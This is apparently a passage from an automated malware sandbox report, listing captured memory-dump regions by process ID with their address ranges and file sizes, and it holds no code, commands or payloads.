                                                                                                                                    • memory/1112-195-0x0000019FE7160000-0x0000019FE71D0000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/1128-362-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/1164-172-0x0000021100500000-0x0000021100570000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/1308-353-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/1368-177-0x000001583B800000-0x000001583B870000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/1380-160-0x00000193E1C80000-0x00000193E1CF0000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/1436-347-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/1844-346-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/1924-167-0x000001F2A9EB0000-0x000001F2A9F20000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/2068-261-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2144-357-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2348-260-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2368-178-0x000001FB60400000-0x000001FB60470000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/2368-290-0x000001FB60470000-0x000001FB604E0000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/2380-192-0x0000024F7FC40000-0x0000024F7FCB0000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/2380-294-0x0000024F7FCB0000-0x0000024F7FD20000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/2472-349-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2604-283-0x000001CD00280000-0x000001CD002CB000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      300KB

                                                                                                                                    • memory/2604-284-0x000001CD00840000-0x000001CD008B0000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/2604-161-0x000001CD00310000-0x000001CD00380000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/2712-185-0x0000023DBEB40000-0x0000023DBEBB0000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/2724-193-0x0000023132F10000-0x0000023132F80000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/2840-359-0x000000000042977E-mapping.dmp
                                                                                                                                    • memory/2888-136-0x00007FF675504060-mapping.dmp
                                                                                                                                    • memory/2888-166-0x000002FB18E10000-0x000002FB18E80000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/3176-277-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/3192-270-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/3208-247-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/3496-128-0x0000000000630000-0x0000000000631000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/3496-126-0x0000000000120000-0x0000000000121000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/3496-120-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/3496-133-0x0000000000680000-0x0000000000682000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/3496-130-0x0000000000660000-0x0000000000661000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/3496-129-0x0000000000640000-0x000000000065C000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      112KB

                                                                                                                                    • memory/3516-352-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/3680-153-0x00000216A6320000-0x00000216A6390000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/3680-149-0x00000216A5FA0000-0x00000216A5FEB000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      300KB

                                                                                                                                    • memory/3816-254-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/3944-369-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/3960-361-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4032-116-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4156-187-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      172KB

                                                                                                                                    • memory/4156-181-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4232-331-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4284-196-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4284-199-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4336-267-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4336-280-0x0000000005250000-0x0000000005251000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4336-272-0x00000000009B0000-0x00000000009B1000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4380-248-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4384-364-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4384-363-0x0000000000402F68-mapping.dmp
                                                                                                                                    • memory/4408-200-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4408-203-0x0000000002B70000-0x0000000002B72000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/4412-257-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4444-264-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4448-207-0x000002D626660000-0x000002D6266AB000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      300KB

                                                                                                                                    • memory/4448-241-0x000002D629000000-0x000002D6290FF000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      1020KB

                                                                                                                                    • memory/4448-204-0x00007FF675504060-mapping.dmp
                                                                                                                                    • memory/4448-208-0x000002D626860000-0x000002D6268D1000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      452KB

                                                                                                                                    • memory/4460-356-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4572-209-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4572-211-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      88KB

                                                                                                                                    • memory/4608-214-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4608-216-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4628-358-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4636-217-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4636-229-0x0000000001250000-0x0000000001252000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/4676-221-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4676-244-0x0000000002395000-0x0000000002396000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4676-230-0x0000000002390000-0x0000000002392000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/4676-238-0x0000000002392000-0x0000000002394000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/4728-243-0x0000000001285000-0x0000000001287000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/4728-226-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4728-231-0x0000000001280000-0x0000000001282000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/4728-240-0x0000000001282000-0x0000000001284000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/4728-242-0x0000000001284000-0x0000000001285000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4788-281-0x0000000004BB9000-0x0000000004CBA000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      1.0MB

                                                                                                                                    • memory/4788-274-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4788-298-0x0000000004DE0000-0x0000000004E3C000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      368KB

                                                                                                                                    • memory/4816-235-0x0000000000800000-0x000000000080D000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      52KB

                                                                                                                                    • memory/4816-232-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4856-246-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4964-350-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5048-351-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5072-332-0x00000000004171EE-mapping.dmp
                                                                                                                                    • memory/5188-360-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5204-336-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5284-324-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5328-291-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5336-325-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5436-355-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5496-343-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5524-304-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5544-328-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5564-366-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5664-323-0x00000000009F0000-0x00000000009F1000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/5664-315-0x00000000002A0000-0x00000000002A1000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/5664-318-0x00000000003E0000-0x00000000003E1000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/5664-311-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5664-320-0x00000000009D0000-0x00000000009EB000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      108KB

                                                                                                                                    • memory/5672-334-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5752-317-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5800-367-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5852-319-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5856-368-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5872-365-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/6092-348-0x0000000000000000-mapping.dmp